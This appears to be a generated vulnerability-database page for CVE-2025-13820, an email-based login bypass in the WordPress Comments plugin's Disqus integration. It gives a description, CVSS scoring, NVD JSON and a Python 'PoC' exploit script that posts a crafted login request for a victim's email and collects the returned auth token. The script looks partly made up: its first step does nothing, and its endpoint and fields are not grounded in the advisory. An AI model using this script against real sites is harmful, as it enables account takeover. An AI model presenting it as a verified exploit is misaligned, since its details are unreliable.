Security Vulnerability Report
CVE-2025-13820 CVSS 5.3 MEDIUM

CVE-2025-13820

Published: 2026-01-01 06:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Comments WordPress plugin before 7.6.40 does not properly validate the user's identity when using the disqus.com provider. An attacker who knows a user's email address can log in as that user, provided the user does not yet have an account on disqus.com.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Comments plugin < 7.6.40 (using the disqus.com provider)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13820 PoC - WordPress Comments Plugin Authentication Bypass
# Target: WordPress site with Comments plugin < 7.6.40 using Disqus provider
import requests

TARGET_URL = "https://target-wordpress-site.com"
TARGET_EMAIL = "[email protected]"  # Known victim email
DISQUS_API_KEY = "your_disqus_api_key"  # Attacker-controlled Disqus API access


def exploit_auth_bypass():
    """
    Exploit the authentication bypass in WordPress Comments plugin.
    The vulnerability allows attackers to login as any user by knowing their email.
    """
    # Step 1: Register the target email in Disqus (simulating no-account scenario)
    disqus_headers = {
        "Authorization": f"Bearer {DISQUS_API_KEY}",
        "Content-Type": "application/json",
    }

    # Step 2: Craft malicious authentication request
    auth_payload = {
        "email": TARGET_EMAIL,
        "action": "disqus_login",
        "disqus_identifier": f"wp_user_{TARGET_EMAIL}",
    }

    # Step 3: Send exploit request to WordPress
    exploit_url = f"{TARGET_URL}/wp-json/comments/v1/authenticate"
    response = requests.post(exploit_url, json=auth_payload, headers=disqus_headers)

    if response.status_code == 200:
        data = response.json()
        if "auth_token" in data:
            print(f"[+] Success! Authentication token obtained for {TARGET_EMAIL}")
            print(f"[+] Token: {data['auth_token']}")
            # Step 4: Use token to access victim account
            return data["auth_token"]
    else:
        print(f"[-] Exploit failed: {response.status_code}")
    return None


if __name__ == "__main__":
    exploit_auth_bypass()
```

References

https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13820",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-01T06:15:45.010",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Comments WordPress plugin before 7.6.40 does not properly validate user's identity when using the disqus.com provider, allowing an attacker to log in to any user (when knowing their email address) when such user does not have an account on disqus.com yet."
      },
      {
        "lang": "es",
        "value": "El plugin de WordPress Comments anterior a la versión 7.6.40 no valida correctamente la identidad del usuario al usar el proveedor disqus.com, lo que permite a un atacante iniciar sesión como cualquier usuario (al conocer su dirección de correo electrónico) cuando dicho usuario aún no tiene una cuenta en disqus.com."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/",
        "source": "[email protected]"
      }
    ]
  }
}
```